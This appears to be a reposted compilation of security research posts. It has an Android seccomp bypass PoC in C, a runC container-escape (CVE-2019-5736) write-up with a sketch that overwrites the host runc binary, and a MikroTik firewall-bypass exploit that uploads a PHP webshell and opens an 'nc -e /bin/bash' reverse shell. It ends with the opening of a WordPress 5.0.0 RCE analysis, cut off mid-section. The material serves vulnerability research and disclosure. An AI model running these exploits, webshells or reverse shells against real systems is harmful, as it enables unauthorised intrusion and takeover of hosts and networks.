>= 0x00000022: [true +107, false +106] -> ret TRAP 00a2 ret ALLOW (syscalls: access) 0033 if nr >= 0x0000001a: [true +1, false +0] 0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP 00a2 ret ALLOW (syscalls: ptrace) 0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP 00a2 ret ALLOW (syscalls: getuid) [...] ================ The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace: ================ # Google Breakpad (crash reporter for Chrome) relies on ptrace # functionality. Without the ability to ptrace, the crash reporter # tool is broken. # b/20150694 # https://code.google.com/p/chromium/issues/detail?id=475270 allow isolated_app self:process ptrace; ================ Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace: ================ ===== filter 1 (194 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0002 if arch != ARM: [true +0, false +60] -> ret TRAP [...] 
0074 if nr >= 0x0000007a: [true +1, false +0] 0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP 00c0 ret ALLOW (syscalls: uname) 0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP 00c0 ret ALLOW (syscalls: fsync, sigreturn, clone) [...] 004d if nr >= 0x0000001a: [true +1, false +0] 004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP 00c0 ret ALLOW (syscalls: ptrace) [...] ===== filter 2 (449 instructions) ===== 0001 if arch != ARM: [true +0, false +1] -> ret TRAP [...] 00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid) 00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace) 01c0 ret TRAP [...] 007f if nr >= 0x00000073: [true +0, false +5] 0080 if nr >= 0x00000076: [true +0, false +2] 0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone) [...] ================ Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process. To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot): ================ */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <err.h> #include <signal.h> #include <sys/ptrace.h> #include <errno.h> #include <sys/wait.h> #include <sys/syscall.h> #include <sys/user.h> #include <linux/elf.h> #include <asm/ptrace.h> #include <sys/uio.h> int main(void) { setbuf(stdout, NULL); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { pid_t my_pid = getpid(); while (1) { errno = 0; int res = syscall(__NR_gettid, 0, 0); if (res != my_pid) { printf("%d (%s)\n", res, strerror(errno)); } } } sleep(1); if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach"); int status; if (waitpid(child, &status, 0) != child) err(1, "wait for child"); if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry"); if (waitpid(child, &status, 0) != child) err(1, "wait for child"); int syscallno; struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) }; if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs"); printf("seeing syscall %d\n", syscallno); if (syscallno != __NR_gettid) errx(1, "not gettid"); syscallno = __NR_swapon; if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs"); if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall"); kill(child, SIGCONT); sleep(5); kill(child, SIGKILL); return 0; } /* ================ If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached. For comparison, the following (a straight syscall to swapon()) fails with SIGSYS: ================ #include <unistd.h> #include <sys/syscall.h> int main(void) { syscall(__NR_swapon, 0, 0); } ================ Attaching screenshot from connectbot. I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches. */ Sursa: https://www.exploit-db.com/exploits/46434
Breaking out of Docker via runC – Explaining CVE-2019-5736 Feb 21, 2019 by Yuval Avrahami Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host. Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC and LXC were patched and new versions were released. The vulnerability gained a lot of traction and numerous technology sites and commercial companies addressed it in dedicated posts. Here at Twistlock, our CTO John Morello wrote an excellent piece with all the relevant details and the mitigations offered by the Twistlock platform. Initially, the official exploit code wasn’t to be released publicly until 2019-02-18, in order to prevent malicious parties from weaponizing it before users have had some time to update. In the following days though, several people decided to release their own exploit code. That led the runC team to eventually release their exploit code earlier (2019-02-13) since – as they put it – “the cat was out of the bag”. This post aims to be a comprehensive technical deep dive into the vulnerability and it’s various exploitation methods. So What Is runC? RunC is a container runtime originally developed as part of Docker and later extracted out as a separate open source tool and library. As a “low level” container runtime, runC is mainly used by “high level” container runtimes (e.g. Docker) to spawn and run containers, although it can be used as a stand-alone tool. “High level” container runtimes like Docker will normally implement functionalities such as image creation and management and will use runC to handle tasks related to running containers – creating a container, attaching a process to an existing container (docker exec) and so on. Procfs To understand the vulnerability, we need to go over some procfs basics. The proc filesystem is a virtual filesystem in Linux that presents information primarily about processes, typically mounted to /proc. It is virtual in a sense that it does not exist on disk. Instead, the kernel creates it in memory. It can be thought of as an interface to system data that the kernel exposes as a filesystem. Each process has its own directory in procfs, at /proc/[pid]: As shown in the image above, /proc/self is a symbolic link to the directory of the currently running process (in this case pid 177). Each process’s directory contains several files and directories with information on the process. For the vulnerability, the relevant ones are: /proc/self/exe – a symbolic link to the executable file the process is running, and ; /proc/self/fd – a directory containing the file descriptors open by the process. For example, by listing the files under /proc/self using ls /proc/self one can see that /proc/self/exe points to the ‘ls’ executable. That makes sense as the one accessing /proc/self is the ‘ls’ process that our shell spawned. The Vulnerability Let’s go over the vulnerability overview given by the runC team: The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... 
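The same behavior is easy to reproduce without ls. The following few lines of C (an illustration added here, not from the original post) print where /proc/self/exe points for the current process:

#include <stdio.h>
#include <unistd.h>
#include <limits.h>

int main(void)
{
    char buf[PATH_MAX];

    /* /proc/self/exe names the binary this process is executing. */
    ssize_t n = readlink("/proc/self/exe", buf, sizeof(buf) - 1);
    if (n < 0) {
        perror("readlink");
        return 1;
    }
    buf[n] = '\0';
    printf("/proc/self/exe -> %s\n", buf);
    return 0;
}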
as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. Those two scenarios might seem different, but both require runC to spin up a new process in a container and are implemented similarly. In both cases, runC is tasked with running a user-defined binary in the container. In Docker, this binary is either the image’s entry point when starting a new container, or docker exec’s argument when attaching to an existing container. When this user binary is run, it must already be confined and restricted inside the container, or it can jeopardize the host. In order to accomplish that, runC creates a ‘runC init’ subprocess which places all needed restrictions on itself (such as entering or setting up namespaces) and effectively places itself in the container. Then, the runC init process, now in the container, calls the execve syscall to overwrite itself with the user requested binary. This is the method used by runC both for creating new containers and for attaching a process to an existing container. The researchers who revealed the vulnerability discovered that an attacker can trick runC into executing itself by asking it to run /proc/self/exe, which is a symbolic link to the runC binary on the host. An attacker with root access in the container can then use /proc/[runc-pid]/exe as a reference to the runC binary on the host and overwrite it. Root access in the container is required to perform this attack as the runC binary is owned by root. The next time runC is executed, the attacker will achieve code execution on the host. Since runC is normally run as root (e.g. by the Docker daemon), the attacker will gain root access on the host. Why not runC init? The image above might mislead some to believe the vulnerability (i.e. tricking runC into executing itself) is redundant. That is, why can’t an attacker simply overwrite /proc/[runc-pid]/exe instead? A patch for a similar runC vulnerability, CVE-2016-9962, mitigates this kind of attack. CVE-2016-9962 revealed that the runC init process possessed open file descriptors from the host which could be used by an attacker in the container to traverse the host’s filesystem and thus break out of the container. Part of the patch for this flaw was setting the runc init process as ‘non-dumpable’ before it entering the container. In the context of CVE-2019-5736, the ‘non-dumpable’ flag denies other processes from dereferencing /proc/[pid]/exe, and therefore mitigates overwriting the runC binary through it [1]. Calling execve drops this flag though, and hence the new runC process’ /proc/[runc-pid]/exe is accessible. The Symlink Problem The vulnerability may appear to contradict the way symbolic links are implemented in Linux. Symbolic links simply hold the path to their target. For a runC process, /proc/self/exe should contain something like /usr/sbin/runc. When a symlink is accessed by a process, the kernel uses the path present in the link to find the target under the root of the accessing process. That begs the question – when a process in the container opens the symbolic link to the runC binary, why doesn’t the kernel searches for the runC path inside the container root? The answer is that /proc/[pid]/exe does not follow the normal semantics for symbolic links. Technically this might count as a violation of POSIX, but as I mentioned earlier procfs is a special filesystem. 
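To make that overwrite primitive concrete, here is a minimal, hypothetical sketch (not one of the published PoCs) of what a malicious process inside the container could do once it knows the pid of a runC process that has joined the container. The pid and payload below are placeholders. Direct writes to /proc/[runc-pid]/exe fail with ETXTBSY while runC is still executing, so the sketch keeps a read-only descriptor open and re-opens it for writing once runC exits, the same file-descriptor trick described in more detail below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* Placeholders: the pid of the runC process seen inside the container,
   and whatever content the attacker wants the host binary replaced with. */
#define RUNC_EXE "/proc/20054/exe"
#define PAYLOAD  "#!/bin/sh\n# attacker-controlled script now runs whenever runC is invoked\n"

int main(void)
{
    /* Hold a read-only handle to the host runC binary so it stays reachable
       even after the runC process exits and /proc/[pid]/exe disappears. */
    int rofd = open(RUNC_EXE, O_RDONLY);
    if (rofd < 0) { perror("open " RUNC_EXE); return 1; }

    char fdpath[64];
    snprintf(fdpath, sizeof(fdpath), "/proc/self/fd/%d", rofd);

    /* Writing is refused with ETXTBSY while runC is still executing,
       so retry until the runC process has exited. */
    int wfd;
    while ((wfd = open(fdpath, O_WRONLY | O_TRUNC)) < 0 && errno == ETXTBSY)
        usleep(10000);
    if (wfd < 0) { perror("open for writing"); return 1; }

    if (write(wfd, PAYLOAD, strlen(PAYLOAD)) < 0) { perror("write"); return 1; }
    close(wfd);
    close(rofd);
    printf("host runc binary overwritten\n");
    return 0;
}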
When a process opens /proc/[pid]/exe, there is none of the normal procedure of reading and following the contents of a symlink. Instead, the kernel just gives you access to the open file entry directly. Exploitation Soon after the vulnerability was reported, when no POCs were publicly released yet, I attempted to develop my own POC based on the detailed description of the vulnerability given in the LXC patch addressing it. You can find the complete POC code here. Let’s break down LXC’s description of the vulnerability: when runC attaches to a container the attacker can trick it into executing itself. This could be done by replacing the target binary inside the container with a custom binary pointing back at the runC binary itself. As an example, if the target binary was /bin/bash, this could be replaced with an executable script specifying the interpreter path #!/proc/self/exe The ‘#!’ syntax is called shebang and is used in scripts to specify an interpreter. When the Linux loader encounters the shebang, it runs the interpreter instead of the executable. As seen in the video, the program finally executed by the loader is: interpreter [optional-arg] executable-path When the user runs something like docker exec container-name /bin/bash, the loader will recognize the shebang in the modified bash and execute the interpreter we specified – /proc/self/exe, which is a symlink to the runC binary. We can proceed to overwrite the runC binary from a separate process in the container through /proc/[runc-pid]/exe. The attacker can then proceed to write to the target of /proc/self/exe to try and overwrite the runC binary on the host. However in general, this will not succeed as the kernel will not permit it to be overwritten whilst runC is executing. Basically, we cannot overwrite the runC binary while a process is running it. On the other hand, if the runC process exits, /proc/[runc-pid]/exe will vanish and we will lose the reference to the runC binary. To overcome this, we open /proc/[runc-pid]/exe for reading in our process, which creates a file descriptor at /proc/[our-pid]/fd/3. We then wait for the runC process to exit, and proceed to open /proc/[our-pid]/fd/3 for writing, and overwrite runC. Here is the code for overwrite_runc, shortened for brevity: Let’s see some action! The exploit output shows the steps taken to overwrite runC. You can see that the runC process is running as pid 20054. The video can also be seen here. This method has one setback though – it requires an additional process to run the attacker code. Since containers are started with only one process (i.e. the Docker’s image entry point), this approach couldn’t be used to create a malicious image that will compromise the host when run. Some other POCs you might have seen that implement a similar approach are Frichetten’s and feexd’s. Shared Libraries Approach A different exploitation method is used in the official POC released by runC’s maintainers and is superior to POCs similar to mine since it can be implemented to compromise the host through two separate methods: When a user execs a command into an existing attacker controlled container When a user runs a malicious image We’ll now look into building a malicious image since the previous POC already demonstrated the first scenario. The POC I wrote for this method is heavily based on q3k’s POC, which, to the best of my knowledge, was the first published malicious image POC. You can view the full POC code here. Let’s go over the Dockerfile used to build the malicious image. 
First, the entry point of the image is set to /proc/self/exe in order to trick runC into executing itself when the image is run. # Create a symbolic link to /proc/self/exe and set it as the image entrypoint RUN set -e -x ;\ ln -s /proc/self/exe /entrypoint ENTRYPOINT [ "/entrypoint" ] RunC is dynamically linked to several shared libraries at run time, which can be listed using the ldd command. When the runC process is executed in the container, those libraries are loaded into the runC process by the dynamic linker. It is possible to substitute one of those libraries with a malicious version, that will overwrite the runC binary upon being loaded into the runC process. Our Dockerfile builds a malicious version of the libseccomp library: # Append the run_at_link function to the libseccomp-2.3.1/src/api.c file and build libseccomp ADD run_at_link.c /root/run_at_link.c RUN set -e -x ;\ cd /root/libseccomp-2.3.1 ;\ cat /root/run_at_link.c >> src/api.c ;\ DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us ;\ dpkg -i /root/*.deb The Dockerfile appends the content of run_at_link.c one of libsecomp’s source files. Subsequently, the malicious libsecomp is built. The constructor attribute (a GCC-specific syntax) indicates that the run_at_link function is to be executed as an initialization function [2] for libseccomp after the dynamic linker loads the library into the runC process. Since run_at_link will be executed by the runC process, it can access the runC binary at /proc/self/exe. The runC process must exit for the runC binary to be writable though. To enforce the exit, run_at_link calls the execve syscall to execute overwrite_runc. Since execve doesn’t affect the file descriptors open by the process, the same file descriptor trick from the previous POC can be used: The runC process loads the libseccomp library and transfers execution to the run_at_link function. run_at_link opens the runC binary for reading through /proc/self/exe. This creates a file descriptor at /proc/self/fd/${runc_fd_read}. run_at_link calls execve to execute overwrite_runc. The process is no longer running the runC binary, overwrite_runc opens /proc/self/fd/runc_fd_read for writing and overwrites the runC binary. For the following video, I built a malicious image that overwrites the runC binary with a simple script that spawns a reverse shell at port 2345. The docker run command executes runC twice. Once to create and run the container, which executes the POC to overwrite runC, and then again to stop the container using runc delete [3]. The second time runC is executed, it is already overwritten, and hence the reverse shell script is executed instead. The Fix RunC and LXC were both patched using the same approach, which is described clearly in the LXC patch commit: To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it starts or attaches to containers. To do this LXC creates an anonymous, in-memory file using the memfd_create() system call and copies itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. Also as the temporary, in-memory LXC binary is sealed, writes to this will also fail. 
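As a rough sketch of the approach described in that commit message (illustrative only, not the actual LXC or runC patch code), re-executing from a sealed in-memory copy of the current binary can be done with memfd_create(), file seals, and fexecve():

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/stat.h>

extern char **environ;

int main(int argc, char **argv)
{
    (void)argc;

    /* Guard so the re-executed copy does not clone itself again. */
    if (getenv("RUNNING_FROM_MEMFD") != NULL)
        return 0; /* ...continue with the program's normal work here... */
    setenv("RUNNING_FROM_MEMFD", "1", 1);

    /* 1. Anonymous in-memory file that supports sealing. */
    int memfd = memfd_create("cloned-binary", MFD_CLOEXEC | MFD_ALLOW_SEALING);
    if (memfd < 0) { perror("memfd_create"); return 1; }

    /* 2. Copy our own on-disk binary into it. */
    int self = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    if (self < 0) { perror("open /proc/self/exe"); return 1; }
    struct stat st;
    if (fstat(self, &st) < 0) { perror("fstat"); return 1; }
    if (sendfile(memfd, self, NULL, st.st_size) != st.st_size) {
        perror("sendfile"); return 1;
    }
    close(self);

    /* 3. Seal the copy so no further writes or resizes are possible. */
    if (fcntl(memfd, F_ADD_SEALS,
              F_SEAL_SEAL | F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE) < 0) {
        perror("F_ADD_SEALS"); return 1;
    }

    /* 4. Re-execute from the sealed copy; /proc/[pid]/exe of the new process
          now refers to the in-memory file, not the binary on the host disk. */
    fexecve(memfd, argv, environ);
    perror("fexecve");
    return 1;
}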
RunC has been patched using the same method. It re-executes from a temporary copy of itself when it starts or attaches to containers. Consequently, /proc/[runc-pid]/exe now points to the temporary file, and the runC binary can’t be reached from within the container. The temporary file is also sealed to block writing to it, although overwriting it shouldn’t compromise the host. This patch introduced some issues though. The temporary runC copy is created in-memory after the runc init process has already applied the container’s cgroup memory constraints on itself. For containers running with a relatively low memory limit (e.g 10Mb), this can cause processes in the container to be oom-killed (Out Of Memory killed) by the kernel when the runC init process attaches to the container. If you are interested, an issue regarding this complication was created and contains a discussion about alternative fixes that might not introduce the same problem. CVE-2019-5736 and Privileged Containers As a general rule of thumb, privileged containers (of a given container runtime) are less secure then unprivileged containers (of the same runtime). Earlier I stated that the vulnerability affects all Docker containers but only LXC’s privileged containers. So why are Docker unprivileged containers vulnerable while LXC unprivileged containers aren’t? Well, it’s because LXC and Docker define privileged containers differently. In fact, Docker unprivileged containers are considered privileged according to LXC philosophy. Privileged containers are defined as any container where the container uid 0 is mapped to the host's uid 0. The main difference is that LXC runs unprivileged containers in a separate user namespace by default, while Docker doesn’t. User namespaces are a feature of Linux that can be used to separate the container root from the host root. The root inside the container, as well as all other users, are mapped to unprivileged users on the host. In other words, a process can have root access for operations inside the container but is unprivileged for operations outside it. If you would like a more in-depth explanation, I recommend LWN’s namespace series So how does running the container in a user namespace mitigate this vulnerability? The attacker is root inside the container but is mapped to an unprivileged user on the host. Therefore, when the attacker tries to open the host’s runC binary for writing, he is denied by the kernel. You might wonder why Docker doesn’t run containers in a separate user namespace by default. It’s because user namespaces do have some drawbacks in the context of containers, which are a bit out of the scope of this post. If you are interested, Docker and rkt (another container runtime) both list the limitations of running containers in user namespaces. Ending Note I hope this post gave you a bit of insight into the different aspects of this vulnerability. If you are using either runC, Docker, or LXC, don’t forget to update to the patched version. Feel free to reach out with any questions you may have through email or @TwistlockLabs. [1] As a side note, privileged Docker containers (before the new patch) could use the /proc/pid/exe of the runc init process to overwrite the runC binary. To be exact, the specific privileges required are SYS_CAP_PTRACE and disabling AppArmor. [2] For those familiar with Windows DLLs, it resembles DllMain. [3] The container is stopped after overwrite_runc exits, since overwrite_runc was executed as the init process (PID 1) of the container. 
Yuval Avrahami | Security Researcher Yuval Avrahami is a security researcher at Twistlock, dealing with hacking and securing anything related to containers. Yuval is a veteran of the Israeli Air Force, where he served in the role of a researcher. Sursa: https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
MikroTik Firewall & NAT Bypass Exploitation from WAN to LAN Jacob Baines Feb 21 A Design Flaw In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019–3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts. Mistakes were made The proxying behavior is neat, but, to me, the most interesting aspect is that attackers on the WAN can deliver exploits to (nominally) firewall protected hosts on the LAN. This blog will walk through that attack. If you want to skip right to the, sort of complicated, proof of concept video then here it is: A PoC with a network diagram? Pass. The Setup To demonstrate this vulnerability, I need a victim. I don’t have to look far because I have a NUUO NVRMini2 sitting on my desk due to some previous vulnerability work. This NVR is a classic example of a device that should be hidden behind a firewall and probably segmented away from everything else on your network. Join an IoT Botnet in one easy step! In my test setup, I’ve done just that. The NVRMini2 sits behind a MikroTik hAP router with both NAT and firewall enabled. NVRMini2 should be safe from the attacker at 192.168.1.7 One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. By default, Winbox is only available on the MikroTik hAP via the LAN. Don’t worry, I’m just simulating real world configurations. The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. The firewall should prevent that. Let’s see how the attacker can get at 10.0.0.252 anyways. Probing to Bypass the Firewall CVE-2019–3924 is the result of the router not enforcing authentication on network discovery probes. Under normal circumstances, The Dude authenticates with the router and uploads the probes over the Winbox port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated. Probes are a fairly simple concept. A probe is a set of variables that tells the router how to talk to a host on a given port. The probe supports up to three requests and responses. Responses are matched against a provided regular expression. The following is the builtin HTTP probe. The HTTP probe sends a HEAD request to port 80 and checks if the response starts with “HTTP/1.” In order to bypass the firewall and talk to the NVRMini2 from 192.168.1.7, the attacker just needs to provide the router with a probe that connects to 10.0.0.252:80. The obvious question is, “How do you determine if a LAN host is an NVRMini2?” The NVRMini2 and the various OEM variations all have very similar landing page titles. Using the title tag, you can construct a probe that detects an NVRMini2. The following is taken from my proof on concept on GitHub. I’ve again used my WinboxMessage implementation. 
bool find_nvrmini2(Winbox_Session& session, std::string& p_address,
                   boost::uint32_t p_converted_address,
                   boost::uint32_t p_converted_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    msg.add_string(7, "GET / HTTP/1.1\r\nHost:" + p_address + "\r\nAccept:*/*\r\n\r\n");
    msg.add_string(8, "Network Video Recorder Login</title>");
    msg.add_u32(3, p_converted_address); // ip address
    msg.add_u32(4, p_converted_port); // port
    session.send(msg);

    msg.reset();
    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}

You can see I constructed a probe that sends an HTTP GET request and looks for "Network Video Recorder Login</title>" in the response. The router, 192.168.1.70, will take in this probe and send it to the host I've defined in msg.add_u32(3) and msg.add_u32(4). In this case, that would be 10.0.0.252 and 80 respectively. This logic bypasses the normal firewall rules.

The following screenshot shows the attacker (192.168.1.7) using the probe against 10.0.0.254 (Ubuntu 18.04) and 10.0.0.252 (NVRMini2). You can see that the attacker can't even ping these devices. However, by using the router's Winbox interface the attacker is able to reach the LAN hosts.

Discovery of the NVRMini2 on the supposedly unreachable LAN is neat, but I want to go a step further. I want to gain full access to this network. Let's find a way to exploit the NVRMini2.

Crafting an Exploit

The biggest issue with probes is the size limit. The requests and response regular expressions can't exceed a combined 220 bytes. That means any exploit will have to be concise. My NVRMini2 stack buffer overflow is anything but concise. It takes 170 bytes just to overflow the cookie buffer. Not leaving room for much else. But CVE-2018-11523 looks promising.

The code CVE-2018-11523 exploits.

Yup. CVE-2018-11523 is an unauthenticated file upload vulnerability. An attacker can use it to upload a PHP webshell. The proof of concept on exploit-db is 461 characters. Way too big. However, with a little ingenuity it can be reduced to 212 characters.

POST /upload.php HTTP/1.1
Host:a
Content-Type:multipart/form-data;boundary=a
Content-Length:96

--a
Content-Disposition:form-data;name=userfile;filename=a.php

<?php system($_GET['a']);?>
--a

This exploit creates a minimalist PHP webshell at a.php. Translating it into a probe request is fairly trivial.

bool upload_webshell(Winbox_Session& session,
                     boost::uint32_t p_converted_address,
                     boost::uint32_t p_converted_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    msg.add_string(7, "POST /upload.php HTTP/1.1\r\nHost:a\r\nContent-Type:multipart/form-data;boundary=a\r\nContent-Length:96\r\n\r\n--a\nContent-Disposition:form-data;name=userfile;filename=a.php\n\n<?php system($_GET['a']);?>\n--a\n");
    msg.add_string(8, "200 OK");
    msg.add_u32(3, p_converted_address);
    msg.add_u32(4, p_converted_port);
    session.send(msg);

    msg.reset();
    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}
Crafting a Reverse Shell

At this point you could start blindly executing commands on the NVR using the webshell. But being unable to see responses and constantly having to worry about the probe's size restriction is annoying. Establishing a reverse shell back to the attacker's box on 192.168.1.7 is a far more ideal solution.

Now, it seems to me that there is little reason for an embedded system to have nc with the -e option. Reason rarely seems to have a role in these types of things though. The NVRMini2 is no exception. Of course, nc -e is available.

bool execute_reverse_shell(Winbox_Session& session,
                           boost::uint32_t p_converted_address,
                           boost::uint32_t p_converted_port,
                           std::string& p_reverse_ip,
                           std::string& p_reverse_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    msg.add_string(7, "GET /a.php?a=(nc%20" + p_reverse_ip + "%20" + p_reverse_port + "%20-e%20/bin/bash)%26 HTTP/1.1\r\nHost:a\r\n\r\n");
    msg.add_string(8, "200 OK");
    msg.add_u32(3, p_converted_address);
    msg.add_u32(4, p_converted_port);
    session.send(msg);

    msg.reset();
    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}

The probe above executes the command "nc 192.168.1.7 1270 -e /bin/bash" via the webshell at a.php. The nc command will connect back to the attacker's box with a root shell.

Putting It All Together

I've combined the three sections above into a single exploit. The exploit connects to the router, sends a discovery probe to a LAN target, uploads a webshell, and executes a reverse shell back to a WAN host.

albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$

The listener gets the root shell as expected.

Conclusion

I found this bug while scrambling to write a blog to respond to a Zerodium tweet. I was not actively doing MikroTik research. Honestly, I'm just trying to get ready for BSidesDublin. What are the people actually doing MikroTik research finding? Are they turning their bugs over to MikroTik (for nothing) or are they selling those bugs to Zerodium?

Do I have to spell it out for you? Don't expose Winbox to the internet.

Sursa: https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
When dealing with modern JavaScript applications, many penetration testers approach them from an 'outside-in' perspective, an approach that often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in a code-centric manner by utilizing freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
When is a vulnerability actually a vulnerability? I can't answer this question easily, and thus we look at a few examples in this video.
WordPress 5.0.0 Remote Code Execution

19 Feb 2019 by Simon Scannell

This blog post details how a combination of a Path Traversal and Local File Inclusion vulnerability led to Remote Code Execution in the WordPress core. The vulnerability remained uncovered in the WordPress core for over 6 years.

Impact

An attacker who gains access to an account with at least author privileges on a target WordPress site can execute arbitrary PHP code on the underlying server, leading to a full remote takeover. We sent the WordPress security team details about another vulnerability in the WordPress core that can give attackers exactly such access to any WordPress site, which is currently unfixed.

Who is affected?

The vulnerability explained in this post was rendered non-exploitable by another security patch in versions 4.9.9 and 5.0.1. However, the Path Traversal is still possible and currently unpatched. Any WordPress site with a plugin installed that incorrectly handles Post Meta entries can make exploitation still possible. We have seen plugins with millions of active installations make this mistake in the past during the preparations for our WordPress security month.

According to the download page of WordPress, the software is used by over 33% of all websites on the internet. Considering that plugins might reintroduce the issue and taking in factors such as outdated sites, the number of affected installations is still in the millions.

Technical Analysis

Both the Path Traversal and Local File Inclusion vulnerability were automatically detected by our leading SAST solution RIPS within 3 minutes scan time with a click of a button. However, at first sight the bugs looked not exploitable. It turned out that the exploitation of the vulnerabilities is much more complex but possible.

Background - WordPress Image Management

When an image is uploaded to a WordPress installation, it is first moved to the uploads directory (wp-content/uploads). WordPress will also create an internal reference to the image in the database, to keep track of meta information such as the owner of the image or the time of the upload. This meta information is stored as Post Meta entries in the database. Each of these entries are a key / value pair, assigned to a certain ID.

Example Post Meta reference to an uploaded image 'evil.jpg':

MariaDB [wordpress]> SELECT * FROM wp_postmeta WHERE post_ID = 50;
+---------+-------------------------+----------------------------+
| post_id | meta_key                | meta_value                 |
+---------+-------------------------+----------------------------+
|      50 | _wp_attached_file       | evil.jpg                   |
|      50 | _wp_attachment_metadata | a:5:{s:5:"width";i:450 ... |
...
+---------+-------------------------+----------------------------+

In this example, the image has been assigned the post_ID 50. If the user wants to use or edit the image with said ID in the future, WordPress will look up the matching _wp_attached_file meta entry and use its value in order to find the file in the wp-content/uploads directory.

Core issue - Post Meta entries can be overwritten

The issue with these Post Meta entries prior to WordPress 4.9.9 and 5.0.1 is that it was possible to modify any entries and set them to arbitrary values. When an image is updated (e.g. its description is changed), the edit_post() function is called. This function directly acts on the $_POST array. Arbitrary Post Meta values can be updated.

function edit_post( $post_data = null ) {
    if ( empty($postarr) )
        $postarr = &$_POST;
    ⋮
    if ( ! empty( $postarr['meta_input'] ) ) {
        foreach ( $postarr['meta_input'] as $field => $value ) {
            update_post_meta( $post_ID, $field, $value );
        }
    }

As can be seen, it is possible to inject arbitrary Post Meta entries. Since no check is made on which entries are modified, an attacker can update the _wp_attached_file meta entry and set it to any value. This does not rename the file in any way, it just changes the file WordPress will look for when trying to edit the image. This will lead to a Path Traversal later.

Path Traversal via Modified Post Meta

